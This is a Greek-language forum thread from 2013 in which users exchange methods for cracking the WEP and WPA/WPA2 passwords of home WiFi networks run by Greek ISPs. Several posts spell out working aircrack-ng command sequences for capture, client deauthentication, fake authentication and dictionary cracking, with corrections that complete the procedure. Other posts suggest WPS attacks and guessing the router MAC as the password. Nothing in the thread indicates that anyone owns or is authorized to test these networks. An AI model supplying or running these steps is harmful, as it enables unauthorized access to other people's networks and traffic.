falcom93 Δημοσ. 17 Ιουλίου 2013 Share Δημοσ. 17 Ιουλίου 2013 για ποια κρυπτογραφηση μιλαμε...??? wpa.. Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Evoliasmenos Δημοσ. 17 Ιουλίου 2013 Share Δημοσ. 17 Ιουλίου 2013 wpa.. μπορεις αν εχει ''on'' το wps...γενικα σε δικτυα με wpa/wpa2 αν δεν δημιουργηθει καποια λιστα με τα ελληνικα δεδομενα στα passphrases κτλ δεν προκειται να βγαλεις ακρη...οτι λιστα κυκλοφορει ειναι για router του εξωτερικου...αυτο το λινκ ειναι ενας τροπος αν λειτουργει το wps παντα ξαναλεω.... Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
petaki12 Δημοσ. 24 Ιουλίου 2013 Share Δημοσ. 24 Ιουλίου 2013 Χωρίς να το έχω ψάξει πάρα πολύ, το έχω ψάξει, όμως, μόνος μου, απλά καταφεύγω και ρωτάω και εσάς. Υπάρχει κανένα wordlist για Wind δίκτυα με WPA-PSK προστασία? Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Evoliasmenos Δημοσ. 24 Ιουλίου 2013 Share Δημοσ. 24 Ιουλίου 2013 Χωρίς να το έχω ψάξει πάρα πολύ, το έχω ψάξει, όμως, μόνος μου, απλά καταφεύγω και ρωτάω και εσάς. Υπάρχει κανένα wordlist για Wind δίκτυα με WPA-PSK προστασία? μπα απ'οσο ξερω οχι...μπορεις βεβαια να τσεκαρεις/googlareis το amigdalo http://amigdalo.ath.cx/ST/ ...η αυτο το site που το ανεφερε καποιος πιο παλια σ'αυτο το θεμα http://nasos.gr/nf/ αυτος ο τροπος ισχυει για wep 100% ifconfig wlan0 iwconfig wlan0 airmon-ng start (your interface) iwconfig airodump-ng mon0 airodump-ng mon0 --bssid (Mac Address) -c (channel no.) -w (filename) .....μολις μαζεψει απο 70000data και μετα το σταματας με ctrl+c aircrack-ng (file name) πχ WEPkey-01.cap ...........και για wpa/wpa2 με wordlist airmon-ng airmon-ng start wlan0 clear airodump-ng mon0 airodump-ng -w WPACap -c (opoio kanali einai) mon0 ''NEW CONSOLE'' aireplay-ng -0 0 -a (router mac) -c (client mac) mon0 ''NEW CONSOLE'' aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst WPACap-01.cap '''PARADEIGMA PROORISMOU''' Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
moxalis Δημοσ. 24 Ιουλίου 2013 Share Δημοσ. 24 Ιουλίου 2013 Αν θυμάμαι καλά τα περισσότερα Wind είναι ZTE οπότε δε νομίζω να βοηθήσουν τα παραπάνω. Δοκίμασε να βάλεις pass την mac με μικρά ή αλλιώς τσέκαρε αν έχει WPS. Όσες φορές είχα πετύχει Wind ήταν on. Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Evoliasmenos Δημοσ. 24 Ιουλίου 2013 Share Δημοσ. 24 Ιουλίου 2013 Αν θυμάμαι καλά τα περισσότερα Wind είναι ZTE οπότε δε νομίζω να βοηθήσουν τα παραπάνω. Δοκίμασε να βάλεις pass την mac με μικρά ή αλλιώς τσέκαρε αν έχει WPS. Όσες φορές είχα πετύχει Wind ήταν on. ναι εχεις δικιο απλα του τα εδωσα μηπως τα χρησιμοποιησει για αλλα δικτυα...hol,cyta...και αλλα Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Universal Soldier Δημοσ. 24 Ιουλίου 2013 Share Δημοσ. 24 Ιουλίου 2013 μπα απ'οσο ξερω οχι...μπορεις βεβαια να τσεκαρεις/googlareis το amigdalo http://amigdalo.ath.cx/ST/ ...η αυτο το site που το ανεφερε καποιος πιο παλια σ'αυτο το θεμα http://nasos.gr/nf/ αυτος ο τροπος ισχυει για wep 100% ifconfig wlan0 iwconfig wlan0 airmon-ng start (your interface) iwconfig airodump-ng mon0 airodump-ng mon0 --bssid (Mac Address) -c (channel no.) -w (filename) .....μολις μαζεψει απο 70000data και μετα το σταματας με ctrl+c aircrack-ng (file name) πχ WEPkey-01.cap ...........και για wpa/wpa2 με wordlist airmon-ng airmon-ng start wlan0 clear airodump-ng mon0 airodump-ng -w WPACap -c (opoio kanali einai) mon0 ''NEW CONSOLE'' aireplay-ng -0 0 -a (router mac) -c (client mac) mon0 ''NEW CONSOLE'' aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst WPACap-01.cap '''PARADEIGMA PROORISMOU''' Ο κώδικας για το WEP που έγραψες δουλεύει μονο άμα υπάρχει κίνηση από clients στο WiFi αφού δεν εχεις commands που θα κάνουν injection άρα δεν δουλεύει 100% αφού η διαδικασία είναι μιση. Επίσης το Aircrack το τρέχεις παράλληλα με το airodump και το aircrack κάνει refresh μονο του δεν χρειάζονται 70000 ηώς οπωσδήποτε, το aircrack κάνοντας refresh τεστάρει συνεχεια keys και θα βρει το key μονο με όσα ηώς χρειάζονται δεν χρειάζεται να περιμένεις για 70000 Tώρα το wpa με wordlist είναι δύσκολο γιατι με τα greeklish το dictionary δυσκολεύει αφού για την ίδια λέξη υπάρχουν ένα σορό διαφορετικά syntax. O μονος τρόπος για να κανεις κάτι με WPA είναι το Reaver 2 Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Evoliasmenos Δημοσ. 24 Ιουλίου 2013 Share Δημοσ. 24 Ιουλίου 2013 Ο κώδικας για το WEP που έγραψες δουλεύει μονο άμα υπάρχει κίνηση από clients στο WiFi αφού δεν εχεις commands που θα κάνουν injection άρα δεν δουλεύει 100% αφού η διαδικασία είναι μιση. Επίσης το Aircrack το τρέχεις παράλληλα με το airodump και το aircrack κάνει refresh μονο του δεν χρειάζονται 70000 ηώς οπωσδήποτε, το aircrack κάνοντας refresh τεστάρει συνεχεια keys και θα βρει το key μονο με όσα ηώς χρειάζονται δεν χρειάζεται να περιμένεις για 70000 Tώρα το wpa με wordlist είναι δύσκολο γιατι με τα greeklish το dictionary δυσκολεύει αφού για την ίδια λέξη υπάρχουν ένα σορό διαφορετικά syntax. O μονος τρόπος για να κανεις κάτι με WPA είναι το Reaver δεν χρειαζεται απαραιτητα packet injection να ξερεις...ειναι δοκιμασμενη τουλαχιστον σε 20 διαφορετικα routers...οσο για το wpa/wpa2 εχω εξηγησει παραπανω αυτο που λες για τις wordlists και καλυτερα θα ηταν να διαβαζεις απο την αρχη την συζητηση και οχι να απαντας κατευθειαν σε οποιον γραφει τελευταιος...φιλικα παντα Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Universal Soldier Δημοσ. 24 Ιουλίου 2013 Share Δημοσ. 24 Ιουλίου 2013 Xωρίς injection θες connected clients πάνω για να μαζέψεις ivs και περιμένεις κάνοντας τίποτα να μαζέψεις packets. Θες packet injection για να για να κανεις speed up την διαδικασία και να μαζέψεις ivs σε μερικά λεπτά και χωρίς κανένα client πάνω. Πως αλλιώς θα βρείς το WEP ενός ξεχασμένοu AP χωρίς κίνηση στο WiFi παρα μονο στο ethernet ??? Στις εντολές σου πρέπει να προσθέσεις Packet injection αλλιώς τα βήματα δεν είναι ολοκληρωμένα και προφανώς δεν δουλεύει 100% γιατί δεν εχεις πρόβλεψη τι κανεις άμα δεν έχει clients το WiFi που είναι target. Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Evoliasmenos Δημοσ. 24 Ιουλίου 2013 Share Δημοσ. 24 Ιουλίου 2013 Xωρίς injection θες connected clients πάνω για να μαζέψεις ivs και περιμένεις κάνοντας τίποτα να μαζέψεις packets. Θες packet injection για να για να κανεις speed up την διαδικασία και να μαζέψεις ivs σε μερικά λεπτά και χωρίς κανένα client πάνω. Πως αλλιώς θα βρείς το WEP ενός ξεχασμένοu AP χωρίς κίνηση στο WiFi παρα μονο στο ethernet ??? Στις εντολές σου πρέπει να προσθέσεις Packet injection αλλιώς τα βήματα δεν είναι ολοκληρωμένα και προφανώς δεν δουλεύει 100% γιατί δεν εχεις πρόβλεψη τι κανεις άμα δεν έχει clients το WiFi που είναι target. πλακα-πλακα με aireplay-ng --fakeauth=0 -e ''ονομα bssid'' -a (την mac του router) wlan0 γινεται το accosiation....το δοκιμασα στο backtrack 5 αλλα μου εβγαλε οτι το router μπορει να ειναι απασχολημενο η οτι θελει καποιο kernel patch ενω στο παραδειγμα που το ειδα επιασε αμεσως η διαδικασια(ητανε σε kali-linux,λεω μηπως ειχε καποια διαφορα)...γιατι ετσι...??? Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Universal Soldier Δημοσ. 24 Ιουλίου 2013 Share Δημοσ. 24 Ιουλίου 2013 Το Fakeauth εκτος από source mac θέλει και destination mac δηλαδή θέλει και -h αλλιώς δεν δουλεύει σωστά.Τα Penetration test θέλουν διάβασμα γιατί άμα ξέρεις περίπου τις εντολές δεν κανεις δουλειά. Ξανά κοίταξε λίγο τις εντολές σου να κάλυψης τα κενά στην θεωρία. Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Evoliasmenos Δημοσ. 24 Ιουλίου 2013 Share Δημοσ. 24 Ιουλίου 2013 Το Fakeauth εκτος από source mac θέλει και destination mac δηλαδή θέλει και -h αλλιώς δεν δουλεύει σωστά. Τα Penetration test θέλουν διάβασμα γιατί άμα ξέρεις περίπου τις εντολές δεν κανεις δουλειά. Ξανά κοίταξε λίγο τις εντολές σου να κάλυψης τα κενά στην θεωρία. ξερω οτι ζηταει -h απλα στην συγκεκριμενη φαση σαν -h τι ακριβως βαζω απο την στιγμη που χρησιμοποιω και τo mac και το bssid στην εντολη...δεν μενει κατι αλλο εκτος απο το station που το εμφανιζει οταν γινεται το προσωρινο association με την συσκευη... Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Universal Soldier Δημοσ. 24 Ιουλίου 2013 Share Δημοσ. 24 Ιουλίου 2013 Η εντολή θέλει source και destination mac source είναι το ΑP και destination το Laptop σου Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Evoliasmenos Δημοσ. 25 Ιουλίου 2013 Share Δημοσ. 25 Ιουλίου 2013 Η εντολή θέλει source και destination mac source είναι το ΑP και destination το Laptop σου αρα στην εντολη aireplay-ng --fakeauth=0 -e ''ονομα bssid'' -a (την mac του router) wlan0 τι συμπληρωμα θελει...??? Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Universal Soldier Δημοσ. 25 Ιουλίου 2013 Share Δημοσ. 25 Ιουλίου 2013 Tα εξηγώ αναλυτικό και αποτέλεσμα κανένα ppff, άντε να σε πάρω από το χεράκι: aireplay-ng -1 0 -e <AP ΕSSID> -b < AP BSSID> -h <Mac mon0> mon0 και προφανώς πρέπει να είσαι στο ίδιο κανάλι με το ΑP για να δουλέψει η εντολή. Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Προτεινόμενες αναρτήσεις